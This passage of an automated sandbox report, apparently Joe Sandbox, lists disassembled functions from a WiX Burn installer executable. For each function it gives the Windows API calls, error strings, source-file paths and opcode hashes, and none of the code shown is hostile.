                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ErrorFormatFreeLastLocal
                                                                                                                                                                  • String ID: Failed to allocate string to display error message$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp
                                                                                                                                                                  • API String ID: 2195691534-719764090
                                                                                                                                                                  • Opcode ID: 29c3640c0a9b9d05d0de98d232ce1c079b5fa8bbeea25deaacd864abc08c5d25
                                                                                                                                                                  • Instruction ID: 6a0c9f474338e7b667e096985431b3e4952c0baca7a7f652b65990c7faf6d2d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 29c3640c0a9b9d05d0de98d232ce1c079b5fa8bbeea25deaacd864abc08c5d25
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B01F932A81318F7DF259F84EC0BFDD7A79AB05749F148010FA0865090D2B49F98DF92
                                                                                                                                                                  Function 009179D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,?,?,?,00911144,?,?,00000000), ref: 009179EF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,00911144,?,?,00000000), ref: 00917A1F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareStringlstrlen
                                                                                                                                                                  • String ID: burn.clean.room
                                                                                                                                                                  • API String ID: 1433953587-3055529264
                                                                                                                                                                  • Opcode ID: 00298512150fd794e7ebbf4806796c75915ddeb508c37661b4574d660cd7759c
                                                                                                                                                                  • Instruction ID: 56954296ecae9491eb3c4ce98d4fb9505ea8bb67a459115e8939493e051ee369
                                                                                                                                                                  • Opcode Fuzzy Hash: 00298512150fd794e7ebbf4806796c75915ddeb508c37661b4574d660cd7759c
                                                                                                                                                                  • Instruction Fuzzy Hash: 23F0F67271D2256AC7204BE5AC489BBFBBCDF9A750310441AF905D7220D2309DC0E7E0
                                                                                                                                                                  Function 00970371 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009700B5: SysAllocString.OLEAUT32(00000000), ref: 009700C9
                                                                                                                                                                    • Part of subcall function 009700B5: VariantInit.OLEAUT32(?), ref: 009700D5
                                                                                                                                                                    • Part of subcall function 009700B5: VariantClear.OLEAUT32(?), ref: 009701C4
                                                                                                                                                                    • Part of subcall function 009700B5: SysFreeString.OLEAUT32(00000000), ref: 009701CF
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009703CD
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value from attribute., xrefs: 0097038F
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0097039E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                  • String ID: Failed to get value from attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                  • API String ID: 3379191133-973041108
                                                                                                                                                                  • Opcode ID: 55e13dd2c9a7cc18a062b045c65392a29905bf044194f28698985abf10996fb9
                                                                                                                                                                  • Instruction ID: f66ff3048043c400fc1f6757fa26c1a994706e3431573fa4c9e44daf7a70ab17
                                                                                                                                                                  • Opcode Fuzzy Hash: 55e13dd2c9a7cc18a062b045c65392a29905bf044194f28698985abf10996fb9
                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF0A972A41218FBEF12AB40CC07F9E7A69AB81755F008050F908AA1D0D6B28F20EB91
                                                                                                                                                                  Function 00929187 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write %ls value., xrefs: 00929188
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2586049171
                                                                                                                                                                  • Opcode ID: ac001b28a738abdd854c78593fd6ab35b7d7d79552cfa87380801d39d4d63f8f
                                                                                                                                                                  • Instruction ID: 0eaed6a9d7617496dc6eb6c71f03d2ca2ce5189d40e72493a291933e5a74cd21
                                                                                                                                                                  • Opcode Fuzzy Hash: ac001b28a738abdd854c78593fd6ab35b7d7d79552cfa87380801d39d4d63f8f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE02B34B04318A6DB20AA55EC0BFFEB6309BC5759F10001AB201701D1C9B486D4CB51
                                                                                                                                                                  Function 009291B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write %ls value., xrefs: 009291BA
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2586049171
                                                                                                                                                                  • Opcode ID: 568614fda8d6d9e0cd4676930e0a8c3ba920e0c1994d8749f2f1e6e9895b0905
                                                                                                                                                                  • Instruction ID: 24b9cffc51ae3583737154c1baa2cb3e20b88a70a7ea01c3e98da518c621d0ac
                                                                                                                                                                  • Opcode Fuzzy Hash: 568614fda8d6d9e0cd4676930e0a8c3ba920e0c1994d8749f2f1e6e9895b0905
                                                                                                                                                                  • Instruction Fuzzy Hash: 99E02B34B04318A6DB20BA51EC0BFFEBA309BC5759F10001AB201701D1C9B446C4CB51
                                                                                                                                                                  Function 00929158 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write %ls value., xrefs: 00929159
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2586049171
                                                                                                                                                                  • Opcode ID: e4e3c2b3bb41fb6f4a67c4235d667d8a09074611e48394a38000e4d23695c059
                                                                                                                                                                  • Instruction ID: d0f5fc5cacc6716df4d73b4331bdd33300756e8425ca41a329707381c0e17a3c
                                                                                                                                                                  • Opcode Fuzzy Hash: e4e3c2b3bb41fb6f4a67c4235d667d8a09074611e48394a38000e4d23695c059
                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE02B30B04318A6DF20AA91EC0BFFEB6309BC5759F10015AB205701D1C9B446C4CA91
                                                                                                                                                                  Function 009293EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to update name and publisher., xrefs: 009293EF
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 00929959
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to update name and publisher.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-1652864479
                                                                                                                                                                  • Opcode ID: 10537e41bfd5ee7e9fcfb4038c13318b52c664218baeae47c713a83f19f5af90
                                                                                                                                                                  • Instruction ID: 9d10c3e2bac63a7b9b5f4023f2e127cf60123c2a385386c41fe7e02c7e6dc113
                                                                                                                                                                  • Opcode Fuzzy Hash: 10537e41bfd5ee7e9fcfb4038c13318b52c664218baeae47c713a83f19f5af90
                                                                                                                                                                  • Instruction Fuzzy Hash: 71E09235B04319ABDB11AAA4EC0BBFEB7609B80719F10015AB206601D1C9B489D4CA81
                                                                                                                                                                  Function 0092B9E9 Relevance: 5.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(00057AF8,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092B9FC
                                                                                                                                                                  • CloseHandle.KERNEL32(E8057400,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092BA0D
                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFF71C,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092BA1E
                                                                                                                                                                  • CloseHandle.KERNEL32(BD830005,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092BA30
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  • Opcode ID: 25c516680f10c8c44216f0d64a0bbdf4a943fc99736cfecb5b5eee80953c627f
                                                                                                                                                                  • Instruction ID: e7dfe7cfc4e8a1a3fa3b11b341973f7f3b674f0b9fe847a6c254945d746e30f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 25c516680f10c8c44216f0d64a0bbdf4a943fc99736cfecb5b5eee80953c627f
                                                                                                                                                                  • Instruction Fuzzy Hash: B4017C31411B10DFD7329F14ED08B56BBF4FF54752F008A2DE09A129A9C731A988DF81